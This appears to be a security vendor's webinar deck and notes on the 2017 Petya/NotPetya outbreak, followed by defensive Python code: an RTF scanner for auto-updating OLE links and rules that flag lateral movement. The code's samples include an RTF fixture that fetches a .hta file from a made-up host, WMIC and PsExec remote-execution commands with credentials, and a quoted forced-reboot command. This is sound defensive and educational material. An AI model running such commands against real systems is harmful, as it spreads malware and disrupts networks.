Petya and Weaponized Malware: Is Ransomware the New DDoS Attack?
Phil Richards, CISO
Chris Goettl, Head of Security Solutions
Amber Boehm, Manager of Product Marketing
Live chat using #IvantiWebinars
Petya or NotPetya?
That is the question.
How is Petya/NotPetya infecting systems?
How is Petya spreading?
https://www.symantec.com/connect/blogs/petya-ransomware-outbreak-here-s-what-you-need-know
Editor's Notes

  • #3: Wait, before we go any further, movie plot time! The hero of our story starts the day as they typically might: grabs a coffee and heads off to work, drives to the metro station and jumps on a train into town. Part way through the day there is a disturbance in the office: employees chattering in the background, moving around the office, confused conversation. More and more heads pop up out of their cubes, looking around and asking questions. Suddenly their computer blue-screens and reboots. They see some text on the screen, then a flashing red and black skull-and-crossbones screen comes up, and it ends with a red screen with white text. The message explains that the system has been encrypted and describes the steps to unransom it. After over an hour of confusion, and no response from IT, they decide to go out for lunch with some co-workers. They need to stop and grab some cash at an ATM, where a few people mill about around a screen showing the now familiar red screen with white text. One of their colleagues offers to buy lunch and they move on. They round the corner and walk into their favorite café. The staff say they are sorry, but their systems are down: they cannot seat them, cannot process cards, and cannot even open the till to take cash. The distinctive red screen looms in the background over the hostess's shoulder. Across town, banks, government offices, retail stores, shops, restaurants and coffee shops are all experiencing the same issue. Even the train home is unavailable because the transit system was also hit. The airport shuts down due to the inability to process tickets, baggage and more. Even shipping in and out of the country is affected. Enter the Hollywood movie villain with demands.
  • #4: Amber asks the question: So which is it really? Chris answers: Does it matter? Phil answers: Describe Petya
  • #5: There are a few reported methods of initial infection. One of the most typical in a ransomware campaign, phishing, has been corroborated by several sources and appears to use a recent Office exploit that was resolved in the April Patch Tuesday release (CVE-2017-0199). This vulnerability existed in how Office handled RTF documents: an OLE object in the document could pull in and execute remote content when the file was opened. More alarming, though, is the likelihood that a small Ukrainian financial tech company, MeDoc, was the source of the initial launch of the attack. Reports say the firm's tax software received an update on June 22nd that distributed a malicious payload to its clients as part of the opening salvo of this attack. MeDoc is a financial tech company that makes accounting software to help people and businesses process taxes. Security researchers said that hackers seemed to have breached the company's computer systems and compromised a software update that was pushed to its customers on June 22.   From <http://fortune.com/2017/06/27/petya-ransomware-ukraine-medoc/>
  • #6: Whether it arrives by phishing or by the compromised update, the point where it has gained a foothold is where Petya becomes NotPetya. It spreads using a combination of the EternalBlue SMB exploit (MS17-010) and legitimate administration tooling, WMIC and PsExec, so it has multiple options for reaching each neighbor. A Mimikatz-style credential dump harvests passwords from memory, and those passwords are then used by WMIC and PsExec to move about the network and execute the payload on other systems, which needs no vulnerability at all, only valid credentials. Only after spreading does it encrypt, and it does so differently from most ransomware: rather than encrypting every file on the system one by one, its boot-level stage encrypts the file system's master file table (MFT), so rendering the system unusable is near instantaneous. The rapid spread and the damage this causes are tremendous. Symantec's analysis describes the mechanics:
MBR infection and encryption. Once installed, Petya proceeds to modify the master boot record (MBR). This allows it to hijack the normal loading process of the infected computer during the next system reboot. The modified MBR is used to encrypt the hard disk while simulating a CHKDSK screen. It then displays a ransom note to the user. MBR modification does not succeed if the threat is executed as a normal user, but the threat will still attempt to spread across the network.
At this point, a system reboot is scheduled using the following command:
"/c at 00:49 C:\Windows\system32\shutdown.exe /r /f"
By scheduling and not forcing a reboot, it provides time to allow Petya to spread to other computers in the network before user-mode encryption occurs.
File encryption. Petya performs encryption in two ways:
1. After Petya has spread to other computers, user-mode encryption occurs where files with a specific extension are encrypted on disk.
2. The MBR is modified to add a custom loader which is used to load a CHKDSK simulator. This simulator is used to hide the fact that disk encryption is occurring. This is done after user-mode encryption occurs and thus encryption is twofold: user mode and full disk.
  • #7: There is a lot of speculation that Petya/NotPetya isn't really an attack for financial gain. The collection side of Petya, the part that would actually get the attackers paid, is what is clearly lacking, and after WannaCry's lack of financial success there was little financial motivation to do this. https://www.theregister.co.uk/2017/06/28/petya_notpetya_ransomware/ Nicholas Weaver, a security researcher at the International Computer Science Institute and a lecturer at UC Berkeley, said Petya appears to have been well engineered to be destructive while masquerading as a ransomware strain. Weaver noted that Petya's ransom note includes the same Bitcoin address for every victim, whereas most ransomware strains create a custom Bitcoin payment address for each victim. Also, he said, Petya urges victims to communicate with the extortionists via an email address, while the majority of ransomware strains require victims who wish to pay or communicate with the attackers to use Tor, a global anonymity network that can be used to host Web sites which can be very difficult to take down. https://krebsonsecurity.com/2017/06/petya-ransomware-outbreak-goes-global/#more-39734
  • #8: The only channel for obtaining an unlock code, a single contact email address, was already blocked, with no redundancy for recovery, making payouts even less likely. The intent of this attack was to disrupt entire companies at a time. It is very effective at company-wide impact rather than affecting a small number of systems.
  • #9: Is Petya really ransomware? It does encrypt your system, but that is where the similarities stop. The attackers do not seem to care about the ransom, as the collection portion of the attack is very weak. Look at what was part of the initial launch of Petya/NotPetya: a local/regional Ukrainian software provider was used to hit a general target.
Rosneft - Russia's top oil producer Rosneft said its servers had been hit by a large-scale cyber attack but its oil production was unaffected.
A.P. Moller-Maersk - Danish shipping giant A.P. Moller-Maersk, which handles one out of seven containers shipped globally, said a cyber attack had caused outages at its computer systems across the world.
APM Terminals - Maersk's port operator. 17 shipping container terminals run by APM Terminals had been hacked, including two in Rotterdam and 15 in other parts of the world.
WPP - Britain's WPP, the world's biggest advertising company, said computer systems within several of its agencies had been hit by a suspected cyber attack.
Merck & Co. - Pharmaceutical company Merck & Co. said in a tweet its computer network was compromised as part of a global hack.
Russian Banks - Russia's central bank said there had been "computer attacks" on Russian banks and that in isolated cases their IT systems had been infected. All Russian branches of Home Credit consumer lender are closed because of a cyber attack.
Ukrainian Banks, Power Grid - A number of Ukrainian banks and companies, including the state power distributor, were hit by a cyber attack that disrupted some operations, the Ukrainian central bank said.
Ukrainian International Airport - Yevhen Dykhne, director of the capital's Boryspil Airport, said it had been hit. "In connection with the irregular situation, some flight delays are possible," Dykhne said in a post on Facebook.
Saint Gobain - French construction materials company Saint Gobain said it had been a victim of a cyber attack, and it had isolated its computer systems to protect data.
Deutsche Post - German postal and logistics company Deutsche Post said systems of its Express division in the Ukraine have in part been affected by a cyber attack.
Metro - Germany's Metro said its wholesale stores in the Ukraine had been hit by a cyber attack and the retailer was assessing the impact.
Mondelez International - Food company Mondelez International said employees in different regions were experiencing technical problems but it was unclear whether this was due to a cyber attack.
Evraz - Russian steelmaker Evraz said its information systems had been hit by a cyber attack but its output was not affected.
Unnamed Norway Companies - A ransomware cyber attack is taking place in Norway and is affecting an unnamed international company, says the Nordic country's national security authority.
Immediate targets hit were a perfect mix of infrastructure, transit, finance and shipping. Many groups agree in the assessment that this was a targeted and possibly sponsored attack. So, with the initial target being Ukraine, what can we consider the subsequent global impact to be?
  • #10: https://www.symantec.com/connect/blogs/petya-ransomware-outbreak-here-s-what-you-need-know
  • #11: Collateral damage? Additional secondary or tertiary targets? A combination? It is hard to say right now. I think the line was crossed when a well-known chocolate manufacturer had a facility brought down by this attack. Amber: chime in with "Don't mess with my chocolate!"
  • #12: What is new and different now versus 6 months ago? This was ransomware, but only in its disruption and initial delivery. The spread is much more sophisticated and aimed at widespread impact: unauthenticated access to neighbors on the local network through the SMB exploit, credential-based movement via WMIC and PsExec for everything else, and rapid compromise of whole networks. The end game is not about money in this case. It is not the ransom, it is the disruption. This is ransomware as a DDoS attack, as a social disruptor, as an economic disruptor. This is bigger than anything we have seen before and goes beyond any one of those labels. To call it weaponized is becoming more accurate: it is targeted at decimating an economy, an infrastructure and a social structure, and its epicenter was geographically targeted. This is a taste of the future of cyber attacks. How does this change our perspective on malware, ransomware and threats in general? How do we protect our companies, our personal systems and, in general, our personal lives?
  • #13: Was this a real attack or just a proof of concept? Was WannaCry the alpha, is this the beta, and is the real thing yet to come?
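The phishing vector in note #5 relies on an RTF document whose OLE object is a link that Word refreshes on open. The scanner below is an added example, not code from the webinar or from Ivanti: it decodes each \objdata blob, looks for the standard URL moniker CLSID and any http(s) target inside it, and treats the combination with \objautlink or \objupdate as suspicious. The sample documents are constructed in the code and are not working exploit files; the hostnames and paths in them are made up.

```python
"""Heuristic scan of an RTF attachment for the auto-updating OLE link pattern
used in CVE-2017-0199 delivery (added example, not from the webinar)."""
import binascii
import re

# CLSID of the standard URL moniker {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B},
# as it is laid out in a serialized OLE link blob (little-endian GUID fields).
URL_MONIKER_CLSID_LE = bytes.fromhex("e0c9ea79f9bace118c8200aa004ba90b")

# \objautlink marks a linked (not embedded) object; \objupdate asks Word to
# refresh the link on open. Together they make the document fetch its target.
AUTOLINK = rb"\objautlink"
OBJUPDATE = rb"\objupdate"
URL_RE = re.compile(rb"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+")
OBJDATA_RE = re.compile(rb"\\objdata\b(.*?)\}", re.S)


def extract_objdata(rtf: bytes) -> list:
    """Decode every {\\*\\objdata ...} group; the payload is hex text inside RTF."""
    blobs = []
    for m in OBJDATA_RE.finditer(rtf):
        hexdata = re.sub(rb"[^0-9A-Fa-f]", b"", m.group(1))
        hexdata = hexdata[: len(hexdata) - len(hexdata) % 2]
        try:
            blobs.append(binascii.unhexlify(hexdata))
        except binascii.Error:
            continue
    return blobs


def scan_rtf(rtf: bytes) -> dict:
    """Return the control words and link targets found, plus a verdict."""
    urls = set()
    url_moniker = False
    for blob in extract_objdata(rtf):
        url_moniker = url_moniker or URL_MONIKER_CLSID_LE in blob
        # Targets are stored as ASCII or UTF-16LE; dropping NULs collapses both.
        for view in (blob, blob.replace(b"\x00", b"")):
            urls.update(u.decode("ascii", "replace") for u in URL_RE.findall(view))
    auto_update = AUTOLINK in rtf or OBJUPDATE in rtf
    remote_target = url_moniker or bool(urls)
    if auto_update and remote_target:
        verdict = "suspicious"
    elif rb"\object" in rtf and (auto_update or remote_target):
        verdict = "review"
    else:
        verdict = "clean"
    return {"auto_update": auto_update, "url_moniker": url_moniker,
            "urls": sorted(urls), "verdict": verdict}


def build_sample_rtf(link_target: bytes) -> bytes:
    """Constructed sample document (not a working exploit): with a link target
    it is an auto-updating OLE link; without one, an ordinary embedded object."""
    if link_target:
        flags = rb"\objautlink\objupdate"
        blob = (b"\x01\x05\x00\x00\x02\x00\x00\x00" + URL_MONIKER_CLSID_LE
                + link_target.decode("ascii").encode("utf-16le") + b"\x00\x00")
    else:
        flags = rb"\objemb"
        blob = b"\x01\x05\x00\x00\x02\x00\x00\x00\x0d\x00\x00\x00Excel.Sheet.8\x00" + b"A" * 32
    return (rb"{\rtf1\ansi{\object" + flags + rb"\objw1\objh1"
            + rb"{\*\objclass Word.Document.8}{\*\objdata " + binascii.hexlify(blob)
            + rb"}}\par Quarterly tax summary attached.\par}")


SUSPICIOUS_RTF = build_sample_rtf(b"http://update.example.invalid/template.hta")
BENIGN_RTF = build_sample_rtf(b"")

if __name__ == "__main__":
    for name, doc in (("suspicious", SUSPICIOUS_RTF), ("benign", BENIGN_RTF)):
        print(name, scan_rtf(doc))
```

This is a triage heuristic for mail-gateway or sandbox pre-filtering, not a parser of the full RTF grammar: obfuscated documents (split control words, \bin payloads, nested groups) can evade the regexes, so a "clean" verdict is only a reason to move on to the next check, while "suspicious" is a reason to detonate the file before it reaches a user.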
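Note #6 describes a spreading pattern that leaves traces in ordinary process-creation telemetry: a reboot scheduled with at, remote process creation through WMIC with stolen credentials on the command line, and PsExec against neighboring hosts. The detection logic below is an added example, not the webinar's or Ivanti's code. It runs those rules over constructed Sysmon-like events (the hosts, IPs, user names and paths are made up) and escalates a host that uses two or more distinct lateral-movement techniques inside a short window, which separates the worm from an administrator who merely scheduled a reboot. The scheduled-reboot rule also covers the equivalent schtasks /Create form as a generalization beyond the at command quoted on the slide.

```python
"""Detection logic for the spreading pattern described in note #6, run over
constructed process-creation events (added example, not from the webinar)."""
import re
from collections import defaultdict

# Each rule matches a command line. The scheduled-reboot rule covers the
# "at HH:MM shutdown.exe /r /f" form quoted from Symantec and, as a
# generalization, the equivalent schtasks /Create form.
RULES = {
    "scheduled_forced_reboot": re.compile(
        r"(?:\bat\s+\d{1,2}:\d{2}\b|\bschtasks(?:\.exe)?\s+/create\b).*"
        r"\bshutdown(?:\.exe)?\b.*(?:/r\b.*/f\b|/f\b.*/r\b)", re.I),
    "wmic_remote_exec": re.compile(
        r"\bwmic(?:\.exe)?\b.*?/node:.*?\bprocess\s+call\s+create\b", re.I),
    "psexec_remote_exec": re.compile(
        r"\bpsexec(?:\.exe)?\b.*?\\\\[\w.-]+", re.I),
    "creds_on_cmdline": re.compile(r"/user:\S+.*?/password:", re.I),
}
# Two or more distinct lateral-movement techniques from one host inside this
# window is the worm-like signature; a lone scheduled reboot is just an admin.
LATERAL_RULES = {"wmic_remote_exec", "psexec_remote_exec", "scheduled_forced_reboot"}
WINDOW_SECONDS = 600

# Constructed events in a Sysmon-like shape; hosts, IPs and paths are made up.
SAMPLE_EVENTS = [
    {"ts": 1000, "host": "WS01", "user": "CORP\\alice",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c at 00:49 C:\Windows\system32\shutdown.exe /r /f"},
    {"ts": 1030, "host": "WS01", "user": "CORP\\alice",
     "image": r"C:\Windows\System32\wbem\wmic.exe",
     "cmdline": r'wmic.exe /node:"10.0.0.23" /user:"CORP\svc_backup" /password:"<redacted>" '
                r'process call create "cmd.exe /c C:\Windows\Temp\stage.exe"'},
    {"ts": 1045, "host": "WS01", "user": "CORP\\alice",
     "image": r"C:\Windows\Temp\psexec.exe",
     "cmdline": r"psexec.exe \\10.0.0.24 -accepteula -s -d cmd.exe /c C:\Windows\Temp\stage.exe"},
    {"ts": 1100, "host": "WS02", "user": "CORP\\bob",
     "image": r"C:\Windows\System32\wbem\wmic.exe",
     "cmdline": "wmic.exe os get caption"},
    {"ts": 1200, "host": "WS03", "user": "CORP\\itadmin",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /Create /SC once /TN "maint" /TR "shutdown /r /f" /ST 01:10'},
]


def detect(events):
    """Return one finding per (event, rule) match."""
    findings = []
    for ev in events:
        for name, rx in RULES.items():
            if rx.search(ev["cmdline"]):
                findings.append({"ts": ev["ts"], "host": ev["host"],
                                 "rule": name, "cmdline": ev["cmdline"]})
    return findings


def escalate(findings):
    """Hosts that used >= 2 distinct lateral-movement techniques within the window."""
    by_host = defaultdict(list)
    for f in findings:
        if f["rule"] in LATERAL_RULES:
            by_host[f["host"]].append(f)
    hosts = []
    for host, fs in by_host.items():
        fs.sort(key=lambda f: f["ts"])
        for i, first in enumerate(fs):
            inside = [g for g in fs[i:] if g["ts"] - first["ts"] <= WINDOW_SECONDS]
            if len({g["rule"] for g in inside}) >= 2:
                hosts.append(host)
                break
    return sorted(hosts)


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for f in found:
        print(f"{f['host']:5} {f['rule']:25} {f['cmdline']}")
    print("escalate:", escalate(found))
```

The credential rule is worth keeping separate from the WMIC rule: a /password: argument on a command line is a finding in its own right, because it means a password is now sitting in the process-creation log of every host that ran it. The correlation step is what makes this usable on a real estate; any single rule fires on legitimate administration, but the same host scheduling a forced reboot and pushing executables to neighbors within minutes is the behavior the slide describes.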